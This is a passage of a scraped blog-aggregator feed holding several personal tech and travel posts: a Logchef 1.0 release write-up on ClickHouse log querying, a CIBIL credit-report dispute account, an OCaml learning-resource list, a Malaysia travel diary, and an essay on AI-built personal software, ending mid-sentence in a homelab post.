logs when you don’t know exactly what you’re looking for.\n\n\nBuilding this for ClickHouse required solving a few problems:\nHigh-Cardinality Fields#\nYou can’t just run SELECT DISTINCT field FROM logs on a table with billions of rows. String fields like trace_id would take forever and return millions of values.\nThe solution is a hybrid loading strategy based on column types:\nLowCardinality and Enum fields: Auto-load values when the sidebar opens. These are designed for fields with limited distinct values.\nString fields: Require an explicit click. A badge shows the count is unknown until you ask.\nComplex types (Map, Array, Tuple, JSON): Excluded. You can’t have meaningful “distinct values” for a JSON blob.\nProgressive Loading#\nEach field loads in parallel (max 4 concurrent) with a 15-second timeout. One slow or failed field doesn’t block others – you get a retry button for that specific field.\nQuery Context#\nThe sidebar respects your current query. If you’ve filtered to level=\"error\", the field values update to show only values from error logs. This happens through the backend – the field values endpoint accepts the current LogchefQL query and applies it as a WHERE clause filter. 
Same parser, same SQL generator, consistent results.\nQuery Cancellation#\nHit Esc and it cancels the query in ClickHouse. Without this, pressing “Cancel” would just hide the spinner – the query kept running on the server, burning resources.\nThe implementation uses ClickHouse’s query ID feature:\nSELECT * FROM logs WHERE ...\nSETTINGS query_id = 'logchef-abc123'\nWhen you hit Esc, the frontend calls a cancellation endpoint that runs:\nKILL QUERY WHERE query_id = 'logchef-abc123'\nThe original query returns an error, the UI clears, ClickHouse frees resources. Simple, but requires plumbing the query ID through every execution path.\nAI Query Assistant#\n“Write a query that finds slowest endpoints by p99” actually works. The AI generates LogchefQL or SQL based on natural language and your table schema.\n\n\nUnder the hood it uses go-openai, so any OpenAI-compatible endpoint works – OpenAI, Ollama, vLLM, whatever you prefer. The system prompt includes your table schema so the model knows what fields exist.\nThere’s also an MCP server that exposes Logchef to AI assistants like Claude Desktop, Cursor, or any MCP-compatible client. Instead of context-switching between your AI chat and the log viewer, you can ask directly:\n“What log sources do I have access to?”\n“Find all 500 errors in the last hour from the web service”\n“Show me a histogram of log volume over the past day”\n“What are the most common error messages in the database logs?”\nThe MCP server handles discovery (teams, sources, schemas), querying (full ClickHouse SQL), analysis (histograms, saved queries), and even admin operations. It’s a separate binary that runs alongside Logchef – configure it once, and your AI assistant can query your logs through natural conversation.\nCompact View for Terminal Lovers#\n\n\nNot everyone wants a table. The compact view is a terminal-style display that shows logs as formatted text with syntax highlighting. Denser and faster to scan for certain debugging workflows.\nQuery Variables#\nUse {{namespace}} in your query, and an input field appears automatically. Great for saved queries that teams want to reuse with different parameters.\nThis was a community contribution from @songxuanqing. The implementation detects {{variable}} patterns in the query text and renders input fields dynamically.\nTeam Management and RBAC#\n\n\nLogchef supports multi-tenancy with role-based access. Teams can have multiple data sources, and users can be members of multiple teams with different roles:\nAdmin: Full access, can manage team members and sources\nEditor: Can create\u002Fedit saved queries and collections\nViewer: Read-only access to query and explore logs\nThis integrates with OIDC for SSO, so you can use your existing identity provider.\nAdmin UI for Runtime Config#\nConfigure stuff without touching config files. The admin settings panel lets you change AI configuration, Alertmanager connection, authentication settings, and query timeouts.\n\n\nThis was a migration from config files to database-backed settings. On first boot, Logchef seeds the database from config.toml. After that, the UI takes over and changes are stored in SQLite. Backward compatible – existing config files still work, the UI just overrides them at runtime. No more SSH-ing into production to bump a timeout.\nPrometheus Metrics#\nA \u002Fmetrics endpoint exposes query execution times, error rates, active queries, and other operational data. 
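Wiring that into Prometheus is the usual scrape job (a sketch; the target address is an assumption, point it at wherever your Logchef instance listens):\nscrape_configs:\n  - job_name: \"logchef\"\n    metrics_path: \"\u002Fmetrics\"\n    static_configs:\n      - targets: [\"localhost:8125\"]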
There’s a pre-built Grafana dashboard for monitoring Logchef itself.\nWhat’s Not in 1.0#\nSome things didn’t make the cut:\nLive tail: Streaming logs in real-time. Still on the roadmap.\nDashboarding: Multiple visualizations on one page. Logchef is query-focused; for dashboards, you probably want Grafana with ClickHouse as a datasource.\nCalling It 1.0#\nCalling something “1.0” is weird. There’s no clear line where software becomes “ready.” But I’ve been using Logchef daily at work for months now, and it’s at the point where I trust it. The rough edges are mostly smoothed out. The architecture feels right.\nBuilding tools you use yourself is different. You’re the first to hit the rough edges, so you fix them. Slower than building for imaginary users, but the result is something you actually want to use.\nThanks again to Kailash for the early direction (schema-agnostic was his idea), and to everyone at Zerodha who’s been using this and giving feedback. Thanks to @songxuanqing for query variables and other contributors for docs and bug fixes.\nDemo | Docs | GitHub | v1.0.0 Release\nFin!",[],{"slug":291,"title":292,"link":293,"pubDate":294,"contentSnippet":295,"tags":296,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"berlin","I'm moving to Berlin","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2025\u002F12\u002F12\u002Fberlin\u002F","2025-12-12T00:00:00.000Z","Haven’t posted here in a while, but this is worth an update: I’m moving to Berlin.\nI’ve loved living in Bangalore for the last decade (I moved here just after the\nfirst HillHacks in May 2015), but it is time for an adventure.\nFor the last couple of years, I’ve spent my time living in\nIndiranagar, building communities, helping underline.center,\nworking on blr.today, organizing events, and really doing things that I care\nabout. It has been a wonderful time, but we wanted to experience life\nelsewhere, and Berlin seems to fit the bill.\nBangalore’s infrastructure has been in the news, and it is a part of why I’m\nmoving. An unwalkable footpath on CMH road meant we spent half a year dealing\nwith a broken elbow this year. At Takshashila, I was taught that I’m not\nallowed to bring up civic problems without also coming up with solutions. But\nBangalore is an unsolvable paradox: A city with 50+ unicorns and no walkable\nfootpaths.\nI’ve fought my personal share of battles against the state, but this is one\nwhere I don’t have any hope of making a difference. I appreciate the work\nthat the Bangalore Civil Society is doing in attempting to hold the\nmissing-government accountable - it just isn’t the kind of work that I want\nto do. Fighting for basic necessities (clean air, walkable footpaths, open\npublic spaces, well-funded public transit) shouldn't be anyone's job in a\ncity as large as Bangalore. I’m picking Exit (for now).\nWhy Berlin? Mainly because I have lots of friends there. Our immigration journey\nis still quite early, so maybe I can write about it when things have stabilized\na bit. For now, if you have any Berlin recommendations or connections, please\nsend them my way.",[],{"slug":298,"title":299,"link":300,"pubDate":301,"contentSnippet":302,"tags":303,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"fixing-cibil-with-ai","Fixing a CIBIL Score Disaster with AI","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Ffixing-cibil-with-ai\u002F","2025-12-04T00:00:00.000Z","About a month ago, I downloaded my CIBIL report expecting a routine check. 
Instead, I found loans from lenders I had never interacted with, written-off accounts, overdues from fintechs I had never installed, and even two-wheeler loan enquiries. I don’t even ride a bike.\nMy credit score had collapsed to under 680. I stared at the report trying to understand how this could happen.\nThe Root Cause: A Wrong Date of Birth#\nBuried in my profile section was the problem: my date of birth was wrong. Not a typo, but a completely different year.\nBecause of this mismatch, CIBIL’s system had paired my PAN and mobile number with someone else’s DOB, effectively merging two individuals’ credit histories into one report. The accounts mapped to me included:\nAditya Birla Capital: Short-term personal loan marked as doubtful\u002Fsubstandard\nClix Capital: A loan marked written-off (₹50,000+)\nPoonawalla Fincorp: Personal loans with delayed payments\nRing \u002F Kissht: Unsecured digital loans\nInCred: Personal loan I never took\nDhani Loans: BNPL-style loan with unrecognized activity\nAxio (Capital Float): Old consumer loan\nKrazyBee: Various short-term loans\nTransactree: Small-ticket personal loan\nMultiple enquiries from HDFC, ICICI, IDFC First, Shriram Finance, and others\nSome were written-off, others 90+ days overdue, others still active. On paper, I looked like a serial defaulter.\nUsing AI to Understand the Problem#\nI opened ChatGPT and uploaded the entire PDF with a simple prompt: identify everything wrong in this report.\nWithin minutes, it had mapped every suspicious account, flagged which ones didn’t match my history, highlighted the incorrect DOB, and explained why CIBIL systems mis-map accounts when demographic data is inconsistent.\nMore usefully, it drafted formal dispute letters citing relevant RBI regulations and prepared lender-specific escalations with the right legal language. It felt like having a credit compliance team on demand.\nThe Dispute Process#\nWith the AI-drafted communications as a starting point, I sent disputes to CIBIL and direct emails to each lender. The key was being specific: every email included the CIBIL report control number, the exact account identifiers from the report, and references to specific RBI regulations.\nFor example, when writing to Poonawalla Fincorp about a co-lending arrangement with Kissht, the email included:\nCIBIL Report details:\nControl Number: [REDACTED]\nDownloaded on: [DATE]\nWhere your name appears: “POONAFIN – Personal Loan – Account No. [REDACTED]”\nDelinquency trail in history: DPD values 35 \u002F 62 \u002F 93 \u002F 124 during [MONTHS]\nI reiterate that I have never applied for, signed, or availed any facility from Poonawalla\u002FKissht. This appears to be erroneous mapping \u002F data contamination.\nThe emails also cited the relevant regulations explicitly:\nUnder Section 45-A(2) of the Credit Information Companies (Regulation) Act 2005 and Para 7.2.2 & 8.1.3 of the RBI Master Directions on Credit Information Companies (2021), please verify this record against your origination\u002FKYC systems. If the record is not verifiable or was created with misused\u002Fincorrect KYC, immediately instruct TransUnion CIBIL to delete\u002Fcorrect the entry.\nThis kind of precise, regulation-backed language gets results. Vague complaints are likely to get ignored or deprioritized. 
Specific complaints with control numbers, account IDs, and regulatory citations get escalated to teams that can actually fix things.\nFor co-lending cases (common with fintechs like Kissht, Ring, etc.), I learned to CC both parties and explicitly request a “consolidated correction” so the entry gets fully removed rather than bouncing between two institutions.\nWhen initial responses were slow, I sent reminders that referenced the original complaint number and the 30-day statutory deadline:\nThis is a reminder regarding my complaint Ref No. [REDACTED]. The acknowledgement stated that the issue would be resolved by [DATE], yet I have not received any confirmation.\nFailure to resolve within the statutory period will leave me with no option but to escalate to the RBI Integrated Ombudsman.\nCIBIL started closing disputes. One by one, accounts were removed. Eight fraudulent accounts were purged in the first wave.\nBut there was a catch: even after the fraudulent accounts were removed, my DOB was still wrong. CIBIL kept closing my DOB correction disputes without actually fixing the underlying data. Their responses were templated and generic, treating it like a lender issue when DOB is actually a CIBIL demographic field that they control directly.\nThis required escalating to the Nodal Officer with a sharper tone:\nMy Date of Birth correction dispute has been closed twice, yet my DOB remains incorrect in every new CIBIL report. This is a CIBIL demographic field — it is not lender-controlled and should have been corrected immediately once KYC was submitted.\nBecause of this incorrect DOB, my profile was wrongly merged with another individual’s data. Although many wrong accounts have been removed, the root cause remains uncorrected — the wrong DOB is still mapped, and therefore the risk of future wrongful linkages still exists.\nOnly after escalating to the Nodal Officer did the DOB finally get corrected. Once that happened, the system stopped associating the other person’s accounts with my profile. It was an algorithmic identity collision, and fixing the DOB resolved it.\nThe Outcome#\nMy latest CIBIL report shows the correct date of birth, zero fraudulent loans, no written-off or overdue accounts, and a score back in a healthy range. Only my actual accounts remain.\nWhat I Learned#\nCredit bureaus are not infallible. A single incorrect demographic detail (in my case, a mismatched DOB) can cause wrong loan mappings, score drops, false delinquencies, and a complete distortion of your financial identity.\nThe resolution required documentation, persistence with escalations, and an understanding of RBI regulations. AI made the last part significantly easier. Instead of spending hours researching dispute procedures and drafting formal letters, I could focus on gathering the right documents and following up with the right people.\nIf you haven’t checked your CIBIL report recently, it’s worth verifying that your basic details are correct: DOB, PAN, address, mobile, email. 
One wrong field can create problems that take weeks to untangle.\nFin!",[],{"slug":305,"title":306,"link":307,"pubDate":308,"contentSnippet":77,"tags":309,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"how-openalgo-websocket-works-8c5e61b71d06","How OpenAlgo WebSocket Works","https:\u002F\u002Fopenalgo.medium.com\u002Fhow-openalgo-websocket-works-8c5e61b71d06?source=rss-cda86e929c3------2","Wed, 26 Nov 2025 07:42:18 GMT",[310,311,80,81,82],"zmq","websocket",{"slug":313,"title":314,"link":315,"pubDate":316,"contentSnippet":77,"tags":317,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"white-box-vs-black-box-algorithms-6eacc52cc2fc","White Box vs Black Box Algorithms","https:\u002F\u002Fopenalgo.medium.com\u002Fwhite-box-vs-black-box-algorithms-6eacc52cc2fc?source=rss-cda86e929c3------2","Wed, 26 Nov 2025 03:51:48 GMT",[318,319,320,321,322],"market-regulation","sebi","black-box","white-box","trading-algorithms",{"slug":324,"title":325,"link":326,"pubDate":327,"contentSnippet":77,"tags":328,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"claude-opus-4-5-nano-banana-the-ai-stack-that-turned-my-github-repo-into-a-pitch-deck-cd39f294dead","Claude Opus 4.5 + Nano Banana: The AI Stack That Turned My GitHub Repo into a Pitch Deck","https:\u002F\u002Fopenalgo.medium.com\u002Fclaude-opus-4-5-nano-banana-the-ai-stack-that-turned-my-github-repo-into-a-pitch-deck-cd39f294dead?source=rss-cda86e929c3------2","Tue, 25 Nov 2025 06:10:20 GMT",[329,330,81,331,332],"pitch-deck","nanobanana-ai","claude-code","powerpoint",{"slug":334,"title":335,"link":336,"pubDate":337,"contentSnippet":338,"tags":339,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"hello-for-fediverse","Hello for Fediverse!","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2025\u002F11\u002F16\u002Fhello-for-fediverse\u002F","Sun, 16 Nov 2025 13:22:27 +0000","I started exploring fediverse today",[224,340,341],"#fediverse","newbie",{"slug":343,"title":344,"link":345,"pubDate":346,"contentSnippet":347,"tags":348,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"hacking","Foundations for hacking on OCaml","https:\u002F\u002Fkcsrk.info\u002Focaml\u002F2025\u002F11\u002F10\u002Fhacking\u002F","2025-11-10T10:35:00.000Z","How do you acquire the fundamental computer skills to hack on a complex\nsystems project like OCaml? What’s missing and how do you go about\nbridging the gap?\nThere are many fundamental systems skills that go into working on a\nlanguage like OCaml that only come with soaking in systems programming. By\nsystems programming, I mean the ability to use tools like the command-line,\neditors, version control, build systems, compilers, debuggers, bash scripting,\nand so on.  This is often something that one takes for granted when working on\nsuch projects, but is often inscrutable for new contributors, who may not have\nhad the opportunity to develop these skills.\nI struggle with this in my own research group. Students approach me to work on\nthe OCaml compiler because they have studied OS, Compilers and Computer\nArchitecture in class. But once they understand that working on OCaml involves\nactually hacking on systems, they are often lost. How do you build the compiler\nfrom source? How do you manage your changes? Do I have to build the entire\ncompiler if I make a small change in the runtime system? The compiler crashes\nwith a segfault – how do I debug it? 
Worse, the students do not even know what\nquestions to ask, and come back with “This is all new to me, I don’t know where\nto begin. ChatGPT doesn’t help.”\nThe CS education in India often lacks a focus on these practical systems skills,\nwhich can make it challenging for new contributors to get involved in systems\nprogramming.  Looking at my own past, my undergraduate CS education, like many\nothers in India (and potentially elsewhere), had mandatory OS and Compiler\nConstruction courses. But neither had a dedicated lab component. It is natural\nthat these theoretical courses do not prepare the students for the practical\naspects of systems programming.\nI was privileged to have a computer at my school, an IBM PC AT Model 5170 and\nlater an IBM PC 340, and surprisingly, had an education where I got to do\nprogramming from a very young age. There was lots of BASIC programming but also\njust tinkering with the system, learning how to use DOS, and later Windows 3.1,\n95, and of course playing games (Doom and Prince of Persia, mostly). This early\nexposure to computers and systems programming gave me a head start. Many\nstudents, especially those from less privileged backgrounds, do not have this\nearly exposure. They may have learned some programming, but not had the time to\ntinker with systems for extended periods of time.\nThis challenge of bridging the gap between theoretical CS education and\npractical systems programming skills is a common one faced by professors working\nin the broad systems area. The problem is compounded by the fact that these\nskills are difficult to teach in a traditional classroom setting—they require\nhands-on experience, experimentation, and often many hours of frustration and\ndebugging. These are skills that come from doing, not from reading or watching\nlectures. I would be curious to hear from others about their experiences and how\nthey have addressed this challenge.\nThat said, there are resources available online that can help new contributors\nacquire these skills. This list is biased to the areas of the compiler that I\nwork on. I mainly work on the backend and the runtime system. The only reason I\nusually touch the frontend is to lower the features that I care about to the\nbackend. Here are some I have found useful for working on the OCaml compiler:\nSystems programming\n    \nCourse: MIT Missing Semester: This is a\nfantastic resource that covers a wide range of topics related to systems\nprogramming, including command-line tools, version control, editors, and\nmore. The course is available online for free and includes video lectures,\nnotes, and exercises. I encourage you to read the motivation for this\ncourse.\nCourse: Stanford CS45: CS45 is an extended version\nof the MIT course, and delves into the topics in more detail.\nVideo: CppCon 2015: Greg Law “Give me 15 minutes & I’ll change your view of\nGDB”: The talk explores GDB’s\nless-known features and sheds light on some advanced debugging techniques.\nTool: rr - Lightweight Recording and Deterministic Debugging:\nrr is a powerful tool for recording and replaying program execution, which\ncan be invaluable for debugging complex issues in systems programming. I’ve\nstopped using gdb directly for anything non-trivial and have switched to\nrr.\nOCaml\n    \nCourse: CS3100 Paradigms of Programming:\nThe course covers a significant chunk of the OCaml language. You should be able\nto self-study the course to get a good understanding of the language. 
That said,\nthe course deliberately does not cover the build system (dune), package manager\n(opam), command-line tools for the compiler (ocamlc, ocamlopt), editor\nintegration (merlin, ocaml-lsp, ocamlformat), etc.\nBook: Real World OCaml: The book has a section on the\ncompiler and the runtime system, which gives a great overview of the memory\nrepresentation, garbage collection, and other aspects of the runtime system.\nDiving deeper\n    \nBook: Systems Performance: Enterprise and the Cloud, 2nd Edition:\nThis book provides an in-depth look at systems performance, covering topics\nsuch as CPU architecture, memory hierarchy, storage systems, and networking.\nIt is a valuable resource for understanding the underlying principles of\nsystems programming and performance optimization.\nBook: The Garbage Collection Handbook: This book\noffers a comprehensive overview of garbage collection techniques, algorithms,\nand implementations. It is an essential resource for understanding memory\nmanagement in programming languages like OCaml.\nBook: The Art of Multiprocessor Programming:\nThis book provides a deep dive into concurrent programming and\nsynchronization techniques, which are crucial for understanding\nmulti-threaded runtime systems like OCaml 5’s multicore runtime and the\nprogramming model.\n \n\nI will probably keep editing this post as I find more resources. If you have\nsuggestions for other useful resources or experiences to share, please feel free\nto reach out to me.",[],"KC Sivaramakrishnan","kayceesrk","\u002Fimages\u002Fkayceesrk_photo.jpg","https:\u002F\u002Fkcsrk.info\u002Fatom.xml",{"slug":354,"title":355,"link":356,"pubDate":357,"contentSnippet":358,"tags":359,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"a-bad-day-in-malaysia","A Bad Day in Malaysia","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fa-bad-day-in-malaysia\u002F","Fri, 07 Nov 2025 12:55:20 +0530","Continuing from where Badri and I left off in the last post. On the 7th of December 2024, we boarded a bus from Singapore to the border town of Johor Bahru in Malaysia. The bus stopped at the Singapore emigration for us to get off for the formalities.\nThe process was similar to the immigration at the Singapore airport. It was automatic, and we just had to scan our passports for the gates to open. Here also, we didn’t get Singapore stamps on our passports.\nAfter we were done with the emigration, we had to find our bus. We remembered the name of the bus company and the number plate, which helped us recognize our bus. It wasn’t there already after we came out of the emigration, but it arrived soon enough, and we boarded it promptly.\nFrom the Singapore emigration, the bus travelled a few kilometers and dropped us at Johor Bahru Sentral (JB Sentral) bus station, where we had to go through Malaysian immigration. The process was manual, unlike Singapore, and there was an immigration officer at the counter who stamped our passports (which I like) and recorded our fingerprints.\nAt the bus terminal, we exchanged rupees at an exchange shop to get Malaysian ringgits. We could not find any free drinking water sources on the bus terminal, so we had to buy water.\nBadri later told me that Johor Bahru has a lot of data centers, which need a lot of water for cooling. When he read about it later, he immediately connected it with the fact that there was no free drinking water, and we had to buy water. 
Such data centers can lead to scarcity of water for others in the area.\nFrom JB Sentral, we took a bus to Larkin Terminal, as our hotel was nearby. It was 1.5 ringgits per person (30 rupees). In order to pay the fare, we had to put cash in a box near the driver’s seat.\nAround half an hour later, we reached our hotel. The time was 23:30 hours. The hotel room was hot, as it didn’t have air-conditioning. The weather in Malaysia is on the hotter side throughout the year. It was a budget hotel, and we paid 70 ringgits for our room.\nBadri slept soon after we checked in. I went out around midnight, at 00:30. I was hungry, so I entered a small restaurant nearby, which was quite lively for the midnight hours. At the restaurant, I ordered a coffee and an omelet. I also asked for drinking water. The unique thing was that they put ice in hot water to bring it down to a normal temperature.\nMy bill from the restaurant looked like the table below, as the items’ names were in the local language, Malay:\nItem | Price (Malaysian ringgits) | Indian rupees | Comments\nNescafe Tarik | 2.50 | 50 | Coffee\nAis Kosong | 0.50 | 10 | Water\nTelur Dadar | 2.00 | 40 | Omelet\nSST Tax (6%) | 0.30 | 6 |\nTotal | 5.30 | 106 |\nAfter checking out from the restaurant, I explored nearby shops. I also bought some water before going back to the hotel room.\nThe next day, we had a (pre-booked) bus to Kuala Lumpur. We checked out from the hotel 10 minutes after the check-out time (which was 14:00 hours). However, within those 10 minutes, the hotel staff came up three times asking us to clear out (which we were doing as fast as possible). Finally, on the third visit, they said our deposit was forfeit, even though it was supposed to cover only keys and towels.\nThe above-mentioned bus for Kuala Lumpur was from the nearby Larkin Bus Terminal. The bus terminal was right next to our hotel, so we walked there.\nUpon reaching it, we found that the process of boarding a bus in Malaysia resembled taking a flight. We needed to go to a counter to get our boarding passes, followed by reporting at our gate half an hour before the scheduled time. Furthermore, they had a separate waiting room and boarding gates. Also, there was a display listing buses with their arrivals and departures. Finally, to top it off, the buses had seatbelts.\nWe got our boarding pass for 2 ringgits (40 rupees). After that, we proceeded to get something to eat, as we were hungry. We went to a McDonald’s, but couldn’t order anything because of the long queue. We didn’t have a lot of time, so we proceeded towards our boarding gate without having anything.\nThe boarding gate was in a separate room, which had a vending machine. I tried to order something using my card, but the machine wasn’t working. In Malaysia, there is a custom of queueing up to board buses even before the bus has arrived. We saw it in Johor Bahru as well. The culture is so strong that they even did it in Singapore while waiting for the Johor Bahru bus!\nOur bus departed at 15:30 as scheduled. The journey was around 5 hours. A couple of hours later, our bus stopped for a break. We got off the bus and went to the toilet. As we were starving (we hadn’t eaten anything the whole day), we thought it was a good opportunity to get some snacks. There was a stall selling some food. However, I had to determine which options were vegetarian. We finally settled on a cylindrical box of potato chips, labelled Mister Potato. 
They were 7 ringgits.\nWe didn’t know how long the bus was going to stop. Furthermore, eating inside buses in Malaysia is forbidden. When we went to get some coffee from the stall, our bus driver was standing there and made a face. We got the impression that he didn’t want us to have coffee.\nHowever, after we got back on the bus, we had to wait for a long time for it to resume its journey, as the driver was taking his sweet time to drink his coffee.\nDuring the bus journey, we saw a lot of palm trees along the way. The landscape was beautiful, with good road infrastructure throughout the journey. On the bus, Badri also helped me improve my blog post on obtaining a Luxembourg visa.\nThe bus dropped us at the Terminal Bersepadu Selatan (TBS for short) in Kuala Lumpur at 21:30 hours.\nFinally, we got something to eat at the TBS. We also noticed that the TBS bus station had lockers. This gave us the idea of putting some of our luggage in the lockers later, while we were in Brunei. We had booked a cheap Air Asia ticket which didn’t allow check-in luggage. Further, keeping the check-in luggage in lockers for three days was cheaper than paying the excess luggage penalty to Air Asia.\nWe followed it up by taking the metro, as our hotel was close to a metro station. This had been a bad day: our deposit was forfeited unfairly, and we got almost nothing to eat.\nWe took the metro to reach our hostel, which was located in the Bukit Bintang area. The name of this hostel was Manor by Mingle. I had stayed here earlier in February 2024 for two nights. Back then, I paid 1000 rupees per day for a dormitory bed. However, this time the same hostel was much cheaper. We got a private room for 800 rupees per day, with breakfast included. Earlier it might have been pricier due to my stay falling on weekends, or maybe February brings more tourists to Kuala Lumpur.\nThat’s it for this post. Stay tuned for our adventures in Malaysia!",[],{"slug":361,"title":362,"link":363,"pubDate":364,"contentSnippet":77,"tags":365,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"self-hosting-openais-gpt-oss-a-complete-guide-for-traders-1e85ec2a46ad","Self-Hosting OpenAI’s GPT-OSS: A Complete Guide for Traders","https:\u002F\u002Fopenalgo.medium.com\u002Fself-hosting-openais-gpt-oss-a-complete-guide-for-traders-1e85ec2a46ad?source=rss-cda86e929c3------2","Wed, 05 Nov 2025 07:32:42 GMT",[366,367,368,369,83],"gpt-oss","cline-extension","self-hosting","vllm",{"slug":371,"title":372,"link":373,"pubDate":374,"contentSnippet":77,"tags":375,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"building-an-agentic-trader-from-scratch-a-beginners-guide-bb74b10438b4","Building an Agentic Trader from Scratch: A Beginner’s Guide","https:\u002F\u002Fopenalgo.medium.com\u002Fbuilding-an-agentic-trader-from-scratch-a-beginners-guide-bb74b10438b4?source=rss-cda86e929c3------2","Mon, 03 Nov 2025 18:16:12 GMT",[83,376,377,378,81],"openai-agents-sdk","ai-trading","agentic-ai",{"slug":380,"title":381,"link":382,"pubDate":383,"contentSnippet":384,"tags":385,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"ai-home-cooked-software","AI and Home-Cooked Software","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fai-home-cooked-software\u002F","2025-10-05T00:00:00.000Z","Everyone is worried that AI will replace programmers. 
They’re missing the real revolution: AI is turning everyone into one.\nI’ve been noticing a new pattern: people with deep domain knowledge but no coding experience are now building their own tools. Armed with AI assistants, they can create custom workflows in a matter of days, bypassing traditional development cycles. Are these solutions production-ready? Not even close. But they solve urgent, specific problems, and that’s what matters. Tasks that once required weeks of specialized training are quickly becoming weekend projects.\nThis trend is happening even within the AI companies themselves. Anthropic, for example, shared how their own teams use Claude to accelerate their work. Crucially, this isn’t limited to developers. Their post details how non-technical staff now build their own solutions and create custom automations, providing a powerful real-world example of this new paradigm.\nHome-Cooked Software#\nWhy search for a generic tool when you can build exactly what you need? This question leads to what I call ‘home-cooked software’: small, personal applications we build for ourselves, tailored to our specific needs. Robin Sloan beautifully describes building an app as making “a home-cooked meal,” while Maggie Appleton writes about “barefoot developers” creating software outside traditional industry structures.\nWhat’s new isn’t the concept but the speed and accessibility. With AI, a custom export format, a specific workflow, or the perfect integration is now an afternoon’s work. We’re entering an unprecedented era where the barrier between wanting a tool and having it has nearly vanished.\nBut let’s be clear: the journey from a prototype to a production-ready application is as challenging as ever. In my experience, an AI can churn out a first draft in a few hours, which gets you surprisingly far. But the devil is in the details, and the last stretch of the journey – handling edge cases, ensuring security, and debugging subtle issues – can stretch into weeks. This distinction is crucial. AI isn’t replacing programmers; it’s creating millions of people who can build simple tools. There’s a significant difference.\nThe New Economics#\nAI is fundamentally reshaping the economics of building software. Before AI, even a simple tool required a significant time investment in learning programming basics, understanding frameworks, and debugging. Only tools with broad appeal or critical importance justified the effort. Now, that effort is measured in hours, not months, and the primary barrier is no longer technical knowledge, but imagination and a clear understanding of one’s own needs.\nThis doesn’t apply to complex or security-critical systems, where deep expertise remains essential. But for the long tail of personal utilities, automation scripts, and custom workflows, the math has changed completely. I’m talking about solving all those minor irritations that pile up: the script to reformat a specific CSV export, the dashboard showing exactly the three metrics you care about, or a script that pulls data from a personal project management tool to sync with an obscure time-tracking app.\nThese tools might be held together with digital duct tape, but they solve real problems for real people. And increasingly, that’s all that matters.\nThe Hidden Costs#\nBut this newfound capability isn’t free. It comes with what I call the “AI Tax”: a set of hidden costs that are rarely discussed.\nFirst, prompt engineering can be surprisingly time-consuming, especially for tasks of moderate complexity. 
While simple requests are often straightforward, anything more nuanced can become an iterative dialogue. You prompt, the AI generates a flawed output, you clarify the requirements, and it returns a new version that misses a different detail. It’s a classic 80\u002F20 scenario: you get 80% of the way there with a simple prompt, but achieving the final 20% of correctness requires a disproportionate amount of effort in refining, correcting, and clarifying your intent to the model.\nSecond, there’s the verification burden. Every line of AI-generated code is a plausible-looking liability. It may pass basic tests, only to fail spectacularly in production with an edge case you never considered. AI learned from the public internet, which means it absorbed all the bad code along with the good. SQL injection vulnerabilities, hardcoded secrets, race conditions—an AI will happily generate them all with complete confidence.\nPerhaps the most frustrating aspect is “hallucination debugging”: the uniquely modern challenge of troubleshooting plausible-looking code that relies on APIs or methods that simply don’t exist. Your codebase becomes a patchwork of different AI-generated styles and patterns. Six months later, it’s an archaeological exercise to determine which parts you wrote and which parts an AI contributed.\nBut the most significant danger is that AI enables you to build systems you don’t fundamentally understand. When that system inevitably breaks, you lack the foundational knowledge to debug it effectively.\nBuilding for One#\nDespite these challenges, there’s something profoundly liberating about building software just for yourself. Instead of just sketching out ideas, I’ve started building these small, specific tools. For this blog, I wanted a simple lightbox for images; instead of pulling in a heavy external library, I had Claude write a 50-line JavaScript snippet that did exactly what I needed. I built a simple, single-page compound interest calculator tailored for my own financial planning. To save myself from boilerplate at work, I created prom2grafana, a tool that uses an LLM to convert Prometheus metrics into Grafana dashboards.\nTen years ago, I might have thought about generalizing these tools, making them useful for others, perhaps even starting an open source project. Today? I just want a tool that works exactly how I think. I don’t need to handle anyone else’s edge cases or preferences. Home-cooked software doesn’t need product-market fit—it just needs to fit you.\nWe’re witnessing the emergence of a new software layer. At the base are the professionally-built, robust systems that power our world: databases, operating systems, and rock-solid frameworks. In the middle are commercial applications built for broad audiences. And at the top, a new layer is forming: millions of tiny, personal tools that solve individual problems in highly specific ways.\nThis top layer is messy, fragile, and often incomprehensible to anyone but its creator. It’s also incredibly empowering. Creating simple software is becoming as accessible as writing. And just as most writing isn’t professional literature, most of this new software won’t be professional-grade. That’s not just okay; it’s the point.\nThe implications are profound. Subject-matter experts can now solve their own problems without waiting for engineering resources, and tools can be hyper-personalized to a degree that is impossible for commercial software. 
This unlocks a wave of creativity, completely unconstrained by the need to generalize or find a market.\nYes, there are legitimate concerns. Security is a real risk, though the profile changes when a tool runs locally on personal data with no external access. We’re creating personal technical debt, but when a personal tool breaks, the owner is the only one affected. They can choose to fix it, rebuild it, or abandon it without impacting anyone else. Organizations, on the other hand, will soon have to grapple with the proliferation of incompatible personal tools and establish new patterns for managing them.\nBut these challenges pale in comparison to the opportunities. The barrier between user and creator is dissolving. We’re entering the age of home-cooked software, where building your own tool is becoming as natural as cooking your own meal.\nThe kitchen is open. What will you cook?",[],{"slug":387,"title":388,"link":389,"pubDate":390,"contentSnippet":391,"tags":392,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"state-homelab-2025","State of My Homelab 2025","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstate-homelab-2025\u002F","2025-10-04T00:00:00.000Z","Introduction#\nFor the past five years, I have maintained a homelab in various configurations. This journey has served as a practical exploration of different technologies, from Raspberry Pi clusters running K3s to a 